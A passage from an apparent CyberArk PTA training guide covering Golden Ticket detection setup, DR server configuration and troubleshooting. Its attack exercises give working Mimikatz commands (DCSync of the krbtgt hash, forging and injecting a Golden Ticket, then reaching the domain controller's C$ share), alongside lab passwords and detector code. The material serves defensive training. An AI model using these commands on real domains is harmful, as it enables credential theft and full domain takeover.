gains control over the domain’s Key Distribution Service account (KRBTGT account) by
stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets
(TGTs) for any account in the Active Directory domain. With valid TGTs, the attacker can
request access to any resource/system on a domain from the Ticket Granting Service
(TGS).

Configuring Golden Ticket attack detection

In this section, we are going to configure Golden Ticket detection, which we skipped over
during the initial configuration. Note that we will say No to the first two options presented
to us.

1. In the PVWA, open a connection to PTAServer1 as root.

2. Go to /opt/tomcat/utility (UTILITYDIR) and run:

./goldenTicketConfiguration.sh

3. Enter n not to configure Step 1/3 – PAS connection configuration (we have
already done this).

4. Enter n not to configure Step 2/3 – Network sensor and PTA Agent connection
configuration (we have already done this).

5. Enter y to configure Step 3/3 – Golden Ticket detection configuration.

6. Specify the domain name to monitor as acme.corp


7. Say n to monitor sub-domains.

8. The domain controller IP is 10.0.0.1

9. Safe name is CyberArk-Service-Accounts

10. Leave Root as the default folder and hit Enter.

11. Enter the full object name of the specially created domain account: cyberark-pta-golden.
The easiest way to obtain this name is by locating the account in the PVWA, opening it in
the classic interface, and copying and pasting the name from there. In this way, you can
be absolutely sure that you have the correct name.

Note: This is the object name for a dedicated service account on the domain controller and
is already in CyberArk PAM. This special domain user needs to be created with the
following replication permissions:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes In Filtered Set.

12. Enter the CyberArk administrator username administrator and password Cyberark1
(twice).


13. Say n not to monitor an additional domain.

14. PTA Server will now finish with the Golden Ticket configuration and restart the
appmgr service automatically.

The attack

1. If you are not already logged on, log on to target-win.acme.corp again through
Skytap, using the account admin02.

2. Run the Kerberos Attacks Generator as we did before, bypassing execution policy
and choosing the option Run as administrator. The KAG is in c:\KAG_V5.

3. This time enter option 3 for Golden Ticket.

4. Enter Joker when asked to choose a username to impersonate, although you can
choose anything you want.

Note: The KAG tool will now create the Golden Ticket for the user “Joker”, who is not a
valid user in your domain. This works because the tool is able to steal the hash of the
domain krbtgt (Kerberos Ticket Granting Ticket) account and inject the created ticket
into the current session.

5. To verify the attack worked, make sure you receive a shell on DC01 as Joker.


The response

1. Log in to PVWA and under Security Events look for this recent event.

Note: You may see more than one event related to this attack.
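The kind of checks a detection engine can run against a ticket like the one this exercise forges, as an added Python example (this is not PTA’s own logic; the 10-hour domain policy, the account list and the legitimate sample ticket are constructed, while the forged ticket’s user, RID, groups, service-key type and lifetime are the values shown in the Mimikatz output later in this guide):

```python
"""Golden Ticket indicator checks over TGT metadata.

Added example, not CyberArk PTA's own detection logic. Each record carries
the fields Mimikatz prints for a forged ticket (user, RID, lifetime, service
key type); the domain policy and directory snapshot are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed domain policy: the default Kerberos policy caps a TGT at 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)
# Constructed directory snapshot: account name -> RID. A forged ticket may name
# an account the directory never issued ("Joker", "badboy") or reuse RID 500.
KNOWN_ACCOUNTS = {"administrator": 500, "admin01": 1105, "admin02": 1106,
                  "john": 1201, "tom": 1202}
# Constructed: accounts that are expected to carry privileged group RIDs.
PRIVILEGED_ACCOUNTS = {"administrator", "admin01", "admin02"}
# Group RIDs that confer domain-wide privilege (Domain, Schema, Enterprise Admins).
PRIVILEGED_GROUP_RIDS = {512, 518, 519}
RC4_HMAC = "rc4_hmac_nt"
LIFETIME_FMT = "%m/%d/%Y %I:%M:%S %p"


@dataclass
class TgtRecord:
    user: str
    rid: int
    start: datetime
    end: datetime
    enc_type: str
    group_rids: frozenset = frozenset()


def parse_lifetime(text: str) -> tuple[datetime, datetime]:
    """Parse a 'start ; end ; renew-until' lifetime string into (start, end)."""
    parts = [p.strip() for p in text.split(";")]
    return (datetime.strptime(parts[0], LIFETIME_FMT),
            datetime.strptime(parts[1], LIFETIME_FMT))


def golden_ticket_indicators(t: TgtRecord) -> list[str]:
    """Return the indicators that make this TGT look forged (empty if clean)."""
    findings = []
    name = t.user.lower()
    if name not in KNOWN_ACCOUNTS:
        # The ticket names an account the directory has never issued.
        findings.append("unknown-account")
    elif KNOWN_ACCOUNTS[name] != t.rid:
        # Name and RID disagree: the ticket body was written by hand.
        findings.append("rid-mismatch")
    if t.end - t.start > MAX_TGT_LIFETIME:
        # A real KDC honours the domain maximum; forged tickets often run for years.
        findings.append("excessive-lifetime")
    if t.enc_type == RC4_HMAC:
        # An RC4 service key is what a ticket built from an NTLM hash carries.
        findings.append("rc4-service-key")
    if t.group_rids & PRIVILEGED_GROUP_RIDS and name not in PRIVILEGED_ACCOUNTS:
        # Privileged group RIDs attached to an account not expected to hold them.
        findings.append("unexpected-privileged-groups")
    return findings


def is_suspicious(t: TgtRecord) -> bool:
    return bool(golden_ticket_indicators(t))


def forged_ticket_sample() -> TgtRecord:
    """The ticket from this guide's Mimikatz output, as a record."""
    start, end = parse_lifetime(
        "3/4/2022 4:26:41 AM ; 3/1/2032 4:26:41 AM ; 3/1/2032 4:26:41 AM")
    return TgtRecord("badboy", 500, start, end, RC4_HMAC,
                     frozenset({513, 512, 520, 518, 519}))


def legitimate_ticket_sample() -> TgtRecord:
    """Constructed ticket as the KDC would issue it to admin01."""
    start = datetime(2022, 3, 4, 9, 0, 0)
    return TgtRecord("admin01", 1105, start, start + MAX_TGT_LIFETIME,
                     "aes256_hmac", frozenset({513, 512}))


if __name__ == "__main__":
    print("forged    :", golden_ticket_indicators(forged_ticket_sample()))
    print("legitimate:", golden_ticket_indicators(legitimate_ticket_sample()))
```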


Active Directory Risks

In this section, we will look at some of the ways in which CyberArk PTA protects your
organization from risks arising from poor Active Directory hygiene. Specifically, we will
look at:

• Exposed credentials
• Unmanaged domain accounts
• Unconstrained delegation

Exposed Credentials

For this to work, we need to “break” our PTA LDAP/S connection by reconfiguring it to use
regular unencrypted LDAP.

Note: Obviously, this is not a recommendation. We are doing this only so that we may see
how the PTA detects this risk.

1. Log in to the PTA Dashboard with the administrator account and password
CyberArk1234.

2. Go to the SETTINGS tab and select AD Connectivity.

3. Change the parameter LDAP over SSL to No. Notice the port number changes.


4. Save your changes and then log out of the PTA Dashboard.

5. Now log in to the PVWA and in Security -> Security Events, you can see the
Exposed Credentials risk.

6. Once tested, reactivate the connection over LDAP/S and save the modification.


Unconstrained Delegation

In an earlier exercise, we added a parameter concerning unconstrained delegation that
scans Active Directory every hour, so by now the PTA will have discovered that the Active
Directory account scanaccount01 is open to abuse due to over-generous delegation.

The PTA detects these configurations and displays them so that administrators can make
decisions about what to do. There may be a reason why a service account is configured
this way. In any case, this account is a good candidate for onboarding to the Vault.

If you want to remove this risky delegation, log on to the domain controller with the
administrator account, go to the Users container and locate scanaccount01. Right-click
on it and select Properties, go to the Delegation tab, and select Do not trust this
user for delegation. Apply your changes.

You can run the following command on the domain controller to remove the SPN:

setspn -d account/nevermind scanaccount01
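What a scan for this risk evaluates, as an added Python example (not the PTA’s own hourly scan): the userAccountControl bit values and LDAP attribute names are Active Directory’s, the account records are constructed to mirror this lab, and clearing the flag is what the Do not trust this user for delegation selection does.

```python
"""Kerberos delegation audit over AD account attributes.

Added example, not the PTA's own hourly scan. The userAccountControl bit
values and LDAP attribute names are Active Directory's; the account
records below are constructed for illustration.
"""
from __future__ import annotations

# userAccountControl bits (values defined by Active Directory).
NORMAL_ACCOUNT = 0x200                      # ordinary user account
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition


def classify_delegation(acct: dict) -> str:
    """Return 'unconstrained', 'constrained', 'constrained+protocol-transition' or 'none'."""
    uac = int(acct.get("userAccountControl", 0))
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained+protocol-transition"
        return "constrained"
    return "none"


def delegation_risks(accounts: list[dict]) -> list[dict]:
    """Flag accounts whose delegation setting a defender should review.

    Domain controllers are unconstrained by design and are skipped; every
    other unconstrained account is reported, noting whether it also holds an
    SPN (the service then caches a forwarded TGT for every client that
    authenticates to it).
    """
    findings = []
    for acct in accounts:
        uac = int(acct.get("userAccountControl", 0))
        if classify_delegation(acct) != "unconstrained" or uac & SERVER_TRUST_ACCOUNT:
            continue
        findings.append({
            "account": acct["sAMAccountName"],
            "risk": "unconstrained-delegation",
            "has_spn": bool(acct.get("servicePrincipalName")),
            "remediation": "clear TRUSTED_FOR_DELEGATION "
                           "(Do not trust this user for delegation)",
        })
    return findings


def clear_unconstrained(uac: int) -> int:
    """userAccountControl after selecting 'Do not trust this user for delegation'."""
    return uac & ~TRUSTED_FOR_DELEGATION


# Constructed directory snapshot mirroring this exercise's lab; the SPN on
# scanaccount01 is the one the setspn command above removes.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "scanaccount01",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["account/nevermind"]},
    {"sAMAccountName": "DC01$",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/dc01.acme.corp"]},
    {"sAMAccountName": "svc_web",  # constructed constrained-delegation service
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.acme.corp:1433"]},
    {"sAMAccountName": "john", "userAccountControl": NORMAL_ACCOUNT},
]


if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(f"{acct['sAMAccountName']:<14} {classify_delegation(acct)}")
    for finding in delegation_risks(SAMPLE_ACCOUNTS):
        print(finding)
```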


Managing PTA Accounts with CyberArk

In this section, we will onboard the PTA accounts to CyberArk PAM.

Managing the PTA Administrator (Web Dashboard)

In this section, we are going to onboard the PTA Dashboard administrator account to the
Vault and connect via the PSM.

1. Log in to the PVWA as Mike and create a new Safe called CyberArk Accounts.

2. Create a new account with the following properties:

System type: Application
Platform: CyberArk PTA
Safe: CyberArk Accounts
Address: ptaserver.acme.corp
Username: administrator
Password: CyberArk1234
Port: 443
Ignore certificates: No


3. Test the connection by clicking on the Connect button.

Note: You may have to run it twice. Also, if you were previously logged into the PTA
normally (through Chrome) and did not log out before closing your session, you may
need to log out that session before this will work.


Troubleshooting

Shortcuts Utility

The output of this command is included as an appendix at the end of this guide.

1. Open a connection to the PTA server.

2. Type “shortcuts.sh” on the command line to see the list of options (type “shortcuts.sh |
more” to see the different types of logs that you can gather from diamond.log).

3. Take a couple of minutes to go through the Aliases and see what information is
presented for each.

4. Spend some time looking into the diamond.log. This is the main log file for your
PTA server and you will need to use some basic Unix commands such as cat, grep,
| (pipe), > (redirect to file) and other commands to extract the data that will assist in
your troubleshooting. For example, the following would output all occurrences of the
string “administrator” on 25 February 2022:

cat /opt/tomcat/logs/diamond.log | grep administrator | grep 2022-02-25 | more


5. Execute “RUN_DIAGNOSTICS” on your PTA server and look at the generated log for
any issues or misconfigurations.

Note: This is a lengthy process, so you might want to run it just before going on a break.

Changing Log Levels

1. You can adjust log levels with the script changeLogLevel.sh (case sensitive). This
script can be run from any location without entering the full path.

2. Change the log level for Listener to debug as shown below (refer to the
documentation).

3. Run “shortcuts.sh 13”. This will output only the most recent incoming syslog
messages from all sources. See documentation and/or the previous exercise for
more information.

4. Next try connecting to Target Linux machine at 10.0.0.20 via PSM or using PuTTY to
create some Syslog events.


Export Tool (CyberArk Support)

The PTA has a built-in tool that can create an export of system configuration information
that can be used when interacting with CyberArk Support about any issues you may
encounter.

1. Go to /opt/tomcat/utility and run exportTool.sh.

2. Enter the number of days of prior records to include (type in “3”, for example).

3. Next type in n not to include db files.

4. Type in y to export dump files.

5. Go to /opt/tomcat/logs folder and look for the recently created archived file. When
working with CyberArk Support, provide them with this archive file.


PTA DR Server

In this section, we are going to configure our DR server, a process that is very much like
the process for configuring the primary server. We will generate a certificate for ptaserver2
as we did for ptaserver1 (the difference will be in the SAN), and run another wizard.

First, make sure that the virtual machine for PTAServer2 is started in Skytap. It is
programmed not to start automatically.

Note: The PTA version on the ptaserver2 machine has already been installed with 12.2.3
in preparation for this training, so there is no need to run an installation.

Getting a Certificate

Creating the CSR

1. Go to Components and launch a new SSH connection to ptaserver2.acme.corp
(this account is already in CyberArk PAM).

2. Go to the utility directory and launch the PTA Utility tool.

UTILITYDIR
./run.sh

3. Select option 14 from the menu (Generating a Certificate Signing Request).

4. Enter the host name of the PTA:

ptaserver.acme.corp

5. Enter the Organization name:

ACME

6. Enter the department name:

Training

7. Enter the City name:

New York

8. Enter the State:


NY

9. Enter the Country code:

US

10. Enter the shared FQDN:

ptaserver.acme.corp

11. Enter the Subject Alternative Names:

dns:ptaserver2.acme.corp,ip:10.0.0.3

Note: Once again, you can either copy the CSR from the PuTTY screen or follow the
instructions below to get the file from the 10.0.0.3 server.

12. Open a WinSCP connection to PTAServer2 via the PVWA. Make sure the option
Map local drives is enabled.

13. In the right-hand navigation pane, browse to the folder /opt/tomcat/ca.

14. In the left-hand pane, browse to the folder C:\CYBR_Files\

15. Copy the file pta_server.csr to the Downloads directory; you can drag and drop the
file within WinSCP.

Signing the CSR

1. Launch Internet Explorer and you will arrive at the Microsoft Active Directory
Certificate Services page:

https://dc01.acme.corp/certsrv

2. If you get a security warning, click the option to proceed.

3. Click Request a certificate.

4. Click Advanced certificate request.

5. Copy all the contents of the pta_server.csr file (or from the PuTTY window) and paste
it in the relevant box as shown below:


6. Select ACME Server from the Certificate Template drop-down menu and click
Submit.

7. Accept the certificate creation.

8. In the next screen select Download certificate, making sure it is DER encoded, and
save it as pta2.cer.

9. Return to the WinSCP application on ptaserver2 and transfer the files pta2.cer and
acme.cer (the Root authority certificate) to the PTA server, placing both files in the
/tmp/ folder.

Installing the Certificate and its Chain

1. Re-open the PuTTY SSH connection to the ptaserver2.

2. Go to the utility folder /opt/tomcat/utility.

Reminder: You can also type “UTILITYDIR” to go directly to this directory.

3. Launch the PTA utility using the following command:

./run.sh

4. Select option 15

5. Enter the full path to your new server certificate, which should be:

/tmp/pta2.cer

6. When asked if you have a Root certificate, type y and then press Enter.


7. Then specify the full path to the Root certificate:

/tmp/acme.cer

8. When asked if you have an Intermediate certificate, type n and then press Enter.

9. Make sure you see the message:

SSL Certificate Chain installed successfully.
Restarting PTA services...

10. PTA services will now be restarted automatically, please allow a moment for this to
take place.

9 Steps

Now we will run the 9-step configuration wizard. It is shorter than the first wizard because
this DR server will take most of its configuration from the Primary server.

1. On the Components server, start an SSH session to the ptaserver2 (either with
PuTTY or via the PSM).

2. Run the following command to navigate to the Wizard Folder:

cd /opt/tomcat/utility/dr

3. Run the following command to run the setup wizard:

./minimalPrepwiz.sh

4. Press y and then Enter to accept the EULA (the End User License Agreement, after
having read it carefully, of course).

5. There is no need to change the root password; this step is skipped automatically.

6. Press n and then Enter to use the pre-configured IP address of 10.0.0.3.

7. To use the existing DNS server 10.0.0.1, select n (default) to continue.

Note: Make sure the configuration test was completed.

8. Press n and then Enter not to specify another DNS server.

9. Define the time zone of the PTA DR Server:


right/Europe/London

10. Specify the current time in the system. Use Components date and current time as
system time. It should look something like:

06/29/2020 15:01

11. Enter n and then Enter not to configure synchronization with an NTP Server.

12. Step 5/9 will configure the database automatically.

13. Step 6/9 will configure the internal components automatically.

14. Step 7/9 will create the PTA maintenance user; type in the password:

Cyberark1

15. Retype password to confirm.

16. Step 8/9 will deploy the web application.

17. Step 9/9 - Setup Disaster Recovery: first enter y to agree to continue.

18. Enter the SAN in FQDN format for the Primary server:

ptaserver1.acme.corp

19. Enter the SAN for the Secondary (DR):

ptaserver2.acme.corp

20. Setup for DR should finish successfully:

Setup Disaster Recovery finished successfully

Primary Setup

As the final step for DR configuration, we will run a short wizard on the primary server
telling it there is now a DR server.

1. Launch a connection to ptaserver1.acme.corp using the PSM.

2. Run the following command to run the setup wizard:


/opt/tomcat/utility/dr/setupPrimary.sh

3. Enter y to continue without taking a snapshot.

4. Set the Primary Subject Alternative Name (SAN):

ptaserver1.acme.corp

5. Enter the Secondary Subject Alternative Name (SAN):

ptaserver2.acme.corp

6. Specify the secondary PTA Server machine root password: Cyberark1

7. Setup for DR on the primary PTA should finish successfully, as shown below:

Setup Disaster Recovery finished successfully

Check the configuration

As a final step in DR setup, we are going to check on each server that it has a file
identifying its current role.

1. Go to /opt/pta/mode on ptaserver1 and you should find a file called primary.

2. Then go to /opt/pta/mode on the DR server (ptaserver2) and there should be a file
called secondary.

3. To verify the replication was successful, go to LOGSDIR or /opt/tomcat/logs and look
for dr-files-sync-success.log. This file should be present on both PTA servers and
indicates the successful sync of data between the primary and secondary servers.


4. Lastly, to verify both servers are online and communicating with each other, run the
following command on ptaserver1:

RUN_DIAGNOSTICS P092

5. You should be able to see the following output, indicating both servers are online.

Failover to PTA DR Server

The process of failing over to the PTA DR server is a manual one. When an administrator
notices that the primary PTA has failed, he or she must log into the DR server and
promote it to the role of primary.

1. Log into the PVWA and open an SSH connection to the primary PTA server.

2. To shut down the server, run the command:

shutdown now

You can then close the PuTTY window.

3. Now launch an SSH connection to the secondary server (PTAServer2) and run the
command:

/opt/tomcat/utility/dr/promoteDemote.sh

4. You will receive a warning asking whether you want to continue. Enter y:


This tool promotes the secondary PTA Server to Primary after the
primary Server fails. This tool can take some time to run and the
changes cannot be reversed.
We recommend taking a snapshot of each PTA Server before running the
tool.
Do you wish to continue? (y/n): y

5. You will then be prompted for the user name and password of a Vault user. Accept
Administrator and enter the password Cyberark1.
The script will perform its tasks and promote the secondary server to the primary role.

Disaster Recovery Promote/Demote finished successfully.

After promotion you must reconfigure PTA AD connectivity by retyping
the password of the PTA active directory user.
Also, edit the dbparm.ini file in the Vault, value SyslogServerIP with
the new PTA Primary IP, and restart the Vault.

6. We will need to re-enter the bind account user password. We do not need to
reconfigure dbparm.ini because the Vault has been configured to forward syslog
messages to both IP addresses for the PTA servers.

7. After a few minutes, run the following on PTAServer2 to verify that it has been
promoted to the primary role:

ls /opt/pta/mode


Optional Exercises

Bring PTAServer1 back on-line as the DR server

Go to https://docs.cyberark.com and find the instructions for bringing a PTA server back
on-line after a failover.

Golden Ticket Attack using Mimikatz

The following exercise can be used as an additional test of the CyberArk PTA’s detection
capabilities. In this section we will detect a Golden Ticket attack, this time using Mimikatz
to generate the attack.

1. Launch a connection to target-win as the domain administrator. You can do this
from within the PVWA or by opening a new Windows session in Skytap. The
password, as always, is Cyberark1.

2. Go to the file C:\Mimikatz\x64\mimikatz.exe and run it as administrator.

3. Run:

privilege::debug

4. You should see:

Privilege '20' OK

5. Run the following:


lsadump::dcsync /user:krbtgt

6. Copy the following SID and Hash NTLM values to Notepad so that we can use them
later (highlighted in red boxes below). For the SID, we are not copying the full string:
we drop the last 3 digits, because we only need the domain's SID.

Hint: You can copy the information in the command window by clicking on the kiwi icon in
the upper left-hand corner of the window and selecting Edit -> Mark and then using
the mouse to select the text to copy.

7. Now enter the following, making sure to replace the values with the values captured
by mimikatz:


Kerberos::golden /user:badboy /domain:acme.corp /sid:SID_VALUE_COPIED /krbtgt:HASH_VALUE_COPIED /ticket:badboy.tck /ptt

Your command should look something like:

Kerberos::golden /user:badboy /domain:acme.corp /sid:S-1-5-21-3225096556-2775381509-898555345 /krbtgt:27c9916821a6d337eb6c1a2d0247f243 /ticket:badboy.tck /ptt

Your output should look something like this:

mimikatz # Kerberos::golden /user:badboy /domain:acme.corp /sid:S-1-5-21-3225096556-2775381509-898555345 /krbtgt:27c9916821a6d337eb6c1a2d0247f243 /ticket:badboy.tck /ptt
User      : badboy
Domain    : acme.corp (ACME)
SID       : S-1-5-21-3225096556-2775381509-898555345
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 27c9916821a6d337eb6c1a2d0247f243 - rc4_hmac_nt
Lifetime  : 3/4/2022 4:26:41 AM ; 3/1/2032 4:26:41 AM ; 3/1/2032 4:26:41 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'badboy @ acme.corp' successfully submitted for current session

mimikatz #

8. To open a command window with the new ticket, run:

misc::cmd

9. In the CMD window type "pushd \\DC01\c$" (Notice that you now have access to the
C drive of DC01 because you have injected the Kerberos Golden Ticket in memory
into the session).

Note: If this does not work immediately, try replacing “DC01” with the IP address of the
domain controller: 10.0.0.1 .


10. Open the Security Events page in PVWA and you should now see a new security
event indicating a Golden Ticket Attack.
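The ticket summary printed by mimikatz shows the properties a detector keys on: a user that does not exist in the directory, RID 500 asserted for a name other than Administrator, a PAC carrying privileged group RIDs, and a lifetime of ten years against a policy of hours. The following Python checker is an added example, not CyberArk or PTA code; it parses a constructed summary in that layout and reports those anomalies, and the lifetime policy, the RID 500 name and the known-user list are assumptions about the lab domain.

```python
"""Flag Golden Ticket indicators in a mimikatz-style ticket summary.
Added example for this exercise, not CyberArk or PTA code."""
import re
from datetime import datetime, timedelta

# Assumed lab policy: AD's default maximum TGT lifetime is 10 hours, the
# built-in RID 500 account is Administrator, and these are the known users.
MAX_TGT_LIFETIME = timedelta(hours=10)
RID_500_NAME = "administrator"
KNOWN_USERS = {"administrator", "krbtgt", "guest"}
PRIVILEGED_RIDS = {"512", "518", "519"}  # Domain, Schema, Enterprise Admins
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"

# Constructed sample in the layout of the kerberos::golden summary above.
FORGED_TICKET = """\
User      : badboy
Domain    : acme.corp (ACME)
SID       : S-1-5-21-3225096556-2775381509-898555345
User Id   : 500
Groups Id : *513 512 520 518 519
Lifetime  : 3/4/2022 4:26:41 AM ; 3/1/2032 4:26:41 AM ; 3/1/2032 4:26:41 AM
"""

def parse_summary(text):
    """Turn 'Label : value' lines into a dict keyed by label."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z ]+?)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def golden_ticket_indicators(text, known_users=KNOWN_USERS):
    """Return the anomalies a detector would raise for this ticket."""
    f = parse_summary(text)
    user = f.get("User", "").lower()
    findings = []
    if user not in known_users:
        findings.append(f"user '{user}' does not exist in the directory")
    if f.get("User Id") == "500" and user != RID_500_NAME:
        findings.append(f"RID 500 asserted for '{user}', not {RID_500_NAME}")
    groups = set(f.get("Groups Id", "").replace("*", "").split())
    if groups & PRIVILEGED_RIDS and user != RID_500_NAME:
        findings.append(f"PAC grants privileged RIDs {sorted(groups & PRIVILEGED_RIDS)}")
    # Lifetime field is "start ; end ; renew-until"; compare start and end.
    start, end = (datetime.strptime(p.strip(), TIME_FMT)
                  for p in f["Lifetime"].split(";")[:2])
    if end - start > MAX_TGT_LIFETIME:
        findings.append(f"lifetime {end - start} exceeds policy {MAX_TGT_LIFETIME}")
    return findings
```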


Appendix

shortcuts.sh

Syntax: /opt/pta/utility/shortcuts.sh [<type>]

1 - Output all errors in the last part of the main PTA log file, follow the file and output any errors as the file grows.
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "ERROR"
2 - Output all errors in the main PTA log file.
    Command: cat /opt/tomcat/logs/diamond.log | grep "ERROR" | less
3 - Output all listener metrics in the last part of the main PTA log file, follow the file and output any listener metrics as the file grows.
    Use this:
      To verify incoming traffic from the sensors (such as Vault, Network Sensor, SIEM)
      To verify the creation of audits per operation (such as Vault retrieve password, Vault logon, Windows logon, Unix logon, Kerberos traffic)
      To verify that the syslogs from the various SIEMs (such as ArcSight, QRadar, Splunk, and so on) are successfully accepted in PTA
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA-listener"
4 - Output all listener metrics in the main PTA log file.
    Use this:
      To verify incoming traffic from the sensors (such as Vault, Network Sensor, SIEM)
      To verify the creation of audits per operation (such as Vault retrieve password, Vault logon, Windows logon, Unix logon, Kerberos traffic)
      To verify that the syslogs from the various SIEMs (such as ArcSight, QRadar, Splunk, and so on) are successfully accepted in PTA
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-listener" | less
5 - Output all sampler metrics in the last part of the main PTA log file, follow the file and output any sampler metrics as the file grows.
    Use this:
      To verify incident creation and that the outbound mail or syslogs were sent
      To verify mitigation results, such as rotate password upon suspected credential theft
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA-sampler"
6 - Output all sampler metrics in the main PTA log file.
    Use this:
      To verify incident creation and that the outbound mail or syslogs were sent


      To verify mitigation results, such as rotate password upon suspected credential theft
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-sampler" | less
7 - Output all scheduled task metrics in the last part of the main PTA log file, follow the file and output any scheduled task metrics as the file grows.
    Use this:
      To verify the results of scheduled tasks, such as Active Directory, Vault accounts and users, and so on
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA-Background"
8 - Output all scheduled task metrics in the main PTA log file.
    Use this:
      To verify the results of scheduled tasks, such as Active Directory, Vault accounts and users, and so on
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-Background" | less
9 - Output all PTA internal services metrics in the last part of the main PTA log file, follow the file and output any PTA internal services metrics as the file grows.
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA-services"
10 - Output all PTA internal services metrics in the main PTA log file.
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-services" | less
11 - Output all metrics in the last part of the main PTA log file, follow the file and output any metrics as the file grows.
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA"
12 - Output all metrics in the main PTA log file.
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA" | less
13 - Output all incoming syslogs in the last part of the main PTA log file, follow the file and output any incoming syslogs as the file grows.
    This requires the Listener component to be on Debug log level.
    Use this:
      To verify the incoming syslog from Vault / SIEM / Network Sensor.
      To see the syslog String received by the PTA from the different inbound sources.
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "Incoming syslog" - Requires Debug level of Listener
14 - Output all incoming syslogs in the main PTA log file.
    This requires the Listener component to be on Debug log level.
    Use this:
      To verify the incoming syslog from Vault / SIEM / Network Sensor.
      To see the syslog String received by the PTA from the different inbound sources.


    Command: cat /opt/tomcat/logs/diamond.log | grep "Incoming syslog" | less - Requires Debug level of Listener
15 - Output all containment calls used in password rotation, pending accounts, and PSM risky Commands in the last part of the main PTA log file, follow the file and output any containment calls as the file grows.
    Use this:
      To troubleshoot issues with mitigation of various containment capabilities such as Rotate Password, Pending un-managed accounts, update Risky Commands scores in the PVWA.
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "CyberArkAuthenticationService.svc/logon"
16 - Output all containment calls used in password rotation, pending accounts, and PSM risky Commands in the main PTA log file.
    Use this:
      To troubleshoot issues with mitigation of various containment capabilities such as Rotate Password, Pending un-managed accounts, update Risky Commands scores in the PVWA.
    Command: cat /opt/tomcat/logs/diamond.log | grep "CyberArkAuthenticationService.svc/logon" | less
17 - Output all dcaserver metrics in the last part of the main PTA log file, follow the file and output any dcaserver metrics as the file grows.
    Use this:
      To troubleshoot configuration issues with the PTA Agents.
      To troubleshoot connection issues between the PTA Agents and the PTA Server
    Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-PTA-dcaserver"
18 - Output all dcaserver metrics in the main PTA log file.
    Use this:
      To troubleshoot configuration issues with the PTA Agents.
      To troubleshoot connection issues between the PTA Agents and the PTA Server
    Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-dcaserver" | less

=====Aliases:=====
LOGSDIR - cd /opt/tomcat/logs
TAILDIAMOND - tail -f /opt/tomcat/logs/diamond.log
LESSDIAMOND - less /opt/tomcat/logs/diamond.log
DEFAULTPARM - less /opt/tomcat/diamond-resources/default/systemparm.properties
LOCALPARM - vi /opt/tomcat/diamond-resources/local/systemparm.properties
VAULTSERVICESDIR - cd /opt/tomcat/VaultServices/
VAULTSERVICESLOG - less /opt/tomcat/VaultServices/Casos.Debug.log
CASOSSERVICESDIR - cd /opt/tomcat/CasosServices


CASOSSERVICESLOG - less /opt/tomcat/CasosServices/Casos.Debug.log
NETWORK_SENSOR_DEVICES - cat /opt/ag/conf/pta_devices.conf
VERSION_NUMBER - cat /opt/tomcat/diamond-resources/version.properties
UPGRADE_HISTORY - cat /opt/tomcat/logs/upgrade_history.log
RUN_DIAGNOSTICS - /opt/pta/diag-tool/pta_tool.sh
SHOW_METRICS - /opt/pta/diag-tool/pta_tool.sh P037
AGENTSHELL - /opt/agentshell/run.sh
EXPORT_UTILITY - /opt/tomcat/utility/exportTool.sh
MONIT_STATUS - sudo -u monit /opt/monit/bin/monit status
STATISTICS - less /opt/tomcat/statistics/logs/statistics.log
UTILITYDIR - cd /opt/tomcat/utility
PREPWIZDIR - cd /opt/tomcat/prepwiz
DRDIR - cd /opt/tomcat/utility/dr
